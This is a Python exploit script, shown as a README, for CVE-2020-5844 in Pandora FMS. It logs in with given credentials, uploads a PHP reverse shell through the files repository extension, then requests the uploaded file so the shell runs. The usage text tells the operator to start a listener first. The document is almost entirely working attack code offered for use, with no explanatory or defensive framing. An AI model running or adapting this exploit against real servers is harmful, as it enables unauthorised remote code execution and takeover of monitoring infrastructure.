README.md
Rendering markdown...
import requests
import re
import sys
import urllib.parse
import base64
################################################
# Script by TheCyberGeek #
# Discovered by TheCyberGeek #
# #
# Start Listener before starting this exploit! #
################################################
if len(sys.argv) < 4:
print("""
Usage: python3 CVE-2020-5844.py URL USER PASS PHP_REVERSE_SHELL
Ex: python3 CVE-2020-5844.py http://10.0.0.2/pandora_console admin pandora reverse.php
""")
sys.exit(0)
else:
base_path, username, password, rev = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4],
s = requests.Session()
f = s.post(base_path + "/index.php?login=1", data={"nick": username, "pass": password, "login_button": "login"})
if "Logout" in f.text:
print("[ + ] Logged in!")
file_ = {'upfile': (rev, open(rev, 'rb'), 'application/x-php')}
t = s.get(base_path + "/index.php?sec=godmode/extensions&sec2=extensions/files_repo")
t = s.post(base_path + "/index.php?sec=godmode/extensions&sec2=extensions/files_repo", files=file_, data={"add_file": 1})
if rev in t.text:
print("[ + ] Great. PHP script uploaded... Now going to execute for you...")
m = re.search(r"^<td id=\"table2.*?\".*?href=\".*?get_file\.php\?file=(.*?)&hash=(.*?)\" target((?!img).)*$", t.text, re.MULTILINE)
if m:
base_location = m.group(1)
base64_bytes = base_location.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
file_location = message_bytes.decode('ascii')
x = file_location.replace("/pandora_console", "")
try:
print("[ + ] Shell received. Check your listener!")
f = s.get(base_path + x, timeout=0.0000000001)
except requests.exceptions.ReadTimeout:
pass
else:
print("[ - ] Failed to upload PHP script...")
print(t.text)
else:
print("[ - ] Cannot login to PandoraFMS...")